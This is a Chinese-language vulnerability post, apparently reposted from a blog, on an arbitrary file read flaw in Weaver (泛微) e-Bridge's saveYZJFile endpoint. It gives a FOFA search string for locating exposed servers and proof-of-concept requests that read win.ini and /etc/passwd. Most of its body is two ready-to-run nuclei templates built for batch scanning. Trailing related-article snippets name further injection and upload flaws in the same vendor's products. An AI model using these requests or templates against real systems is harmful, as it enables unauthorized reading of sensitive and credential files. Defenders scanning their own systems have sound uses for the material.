泛微E-Bridge saveYZJFile任意文件读取漏洞

时间：2023-10-19 22:47:40浏览次数：37

标签：body Bridge 537.36 saveYZJFile dsl file 泛微 condition

漏洞描述

泛微云桥e-Bridge存在任意文件读取漏洞，攻击者成功利用该漏洞，可实现任意文件读取，获取敏感信息。

漏洞复现

fofa语法：app="泛微云桥e-Bridge"
登录页面如下：

windows系统POC：
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C://windows/win.ini&fileExt=txt
Linux系统POC：
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt

拼接上面获得的id号，读取文件
/file/fileNoLogin/165d959362934f099c586129029198e9

nuclei批量yaml文件

id: fanwei_eBridge_saveYZJFile_fileread_windows
info:
  name: 泛微e-Bridge未授权文件读取漏洞
  author: mhb17
  severity: high
  description: description
  reference:
    - https://
  tags: fileread
requests:
  - raw:
      - |-
        GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C://windows/win.ini&fileExt=txt HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close
      - |+
        GET /file/fileNoLogin/{{endpoint}} HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close
    iterate-all: true
    extractors:
      - part: body
        name: endpoint
        internal: true
        type: json
        json:
          - '.["id"]'
    matchers-condition: and
    matchers:
      - type: dsl
        condition: and
        dsl:
          - 'contains((body_2), "bit app support") && status_code_2 == 200'
      - type: dsl
        condition: and
        dsl:
          - 'contains((body_1), "filepath") && status_code_1 == 200'

id: fanwei_eBridge_saveYZJFile_fileread_linux
info:
  name: 泛微e-Bridge未授权文件读取漏洞
  author: mhb17
  severity: high
  description: description
  reference:
    - https://
  tags: fileread
requests:
  - raw:
      - |-
        GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close
      - |+
        GET /file/fileNoLogin/{{endpoint}} HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close
    iterate-all: true
    extractors:
      - part: body
        name: endpoint
        internal: true
        type: json
        json:
          - '.["id"]'
    matchers-condition: and
    matchers:
      - type: dsl
        condition: and
        dsl:
          - 'contains((body_2), "root:") && status_code_2 == 200'
      - type: dsl
        condition: and
        dsl:
          - 'contains((body_1), "filepath") && status_code_1 == 200'

标签：body,Bridge,537.36,saveYZJFile,dsl,file,泛微,condition
From： https://www.cnblogs.com/pursue-security/p/17775878.html

泛微E-Office json_common.php文件存在sql注入漏洞
漏洞简介泛微e-office为企业办公提供丰富应用，覆盖常见协作场景，开箱即用。满足人事、行政、财务、销售、运营、市场等不同部门协作需求，帮助组织高效人事管理。系统json_common.php文件存在SQL注入漏洞漏洞复现fofa语法：app="泛微-EOffice"登录页面如下：POC:POST/building/......
kubeadm init 报错ERROR FileContent--proc-sys-net-bridge-bridge-nf-call-iptables
现象:[ERRORFileContent--proc-sys-net-bridge-bridge-nf-call-iptables]:/proc/sys/net/bridge/bridge-nf-call-iptablescontentsarenotsetto1原因: /proc/sys/net/bridge/bridge-nf-call-iptables 文件的内容并没有设置为1解决方案echo"1">/proc/sys/net/br......
基于 EventBridge 轻松搭建消息集成应用
作者：昶风前言本篇文章主要介绍基于阿里云EventBridge的消息集成能力，结合目前消息产品的需求热点，从能力范围到场景实战，对EventBridge的消息集成解决方案进行了概要的介绍。从消息现状谈起消息队列作为应用解耦，流量削峰填谷的有效工具，早已被开发者广泛应用于各类分布式服务......
Bridge 桥接模式简介与 C# 示例【结构型2】【设计模式来了_7】
〇、简介1、什么是桥接模式？一句话解释：通过一个类的抽象，与另一个类的抽象关联起来，当做桥。此后不管两个抽象类的实现有多少种，均可以通过这个桥来将两个对象联系起来。桥接，顾名思义就是用桥来连接河两岸，将原本不关联的两部分联系起来，且不影响两岸的各自演化，演化出来的不同对......
泛微OA e-office平台uploadify.php任意文件上传漏洞
0x01漏洞描述泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。泛微OAe-office平台uploadify.php处存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限。 ......
泛微OA与ERP集成的关键要点
泛微OA办公系统与ERP系统的集成是为了实现企业内部各个系统之间的数据共享和协同工作，提高工作效率和管理水平。下面将详细介绍泛微OA办公系统如何与ERP系统集成以及轻易云数据集成平台在该过程中发挥的重要作用。集成方式泛微OA办公系统与ERP系统的集成可以采用多种方式实现......
Linux Bridge与veth
创建一对veth（VirtualEthernet）接口，并将它们连接到不同的网络命名空间，然后通过LinuxBridge相连#创建第一个veth对ipnetnsaddns1#创建命名空间ns1ipnetnsexecns1iplinksetloup#在ns1中启用loopback接口iplinkaddveth1typevethpe......
【愚公系列】2023年10月二十三种设计模式(七)-桥接模式(Bridge Pattern)
......
Strimzi Kafka Bridge(桥接)实战之三：自制sdk(golang版本)
欢迎访问我的GitHub这里分类和汇总了欣宸的全部原创(含配套源码)：https://github.com/zq2599/blog_demos本篇概览本文是《StrimziKafkaBridge(桥接)实战》的第三篇，前文咱们掌握了StrimziKafkaBridge的基本功能：基于http提供各种kafka消息的服务此刻，如果想通过http接口调......
泛微8tab页隐藏显示
<scripttype="text/javascript">jQuery(document).ready(function(){$(".tabarea_0").hide();$(".tab_top").remove();jQuery("#field10812").bindPropertyChange(function(){......

泛微E-Bridge saveYZJFile任意文件读取漏洞

漏洞描述

漏洞复现

nuclei批量yaml文件

相关文章

赞助商

阅读排行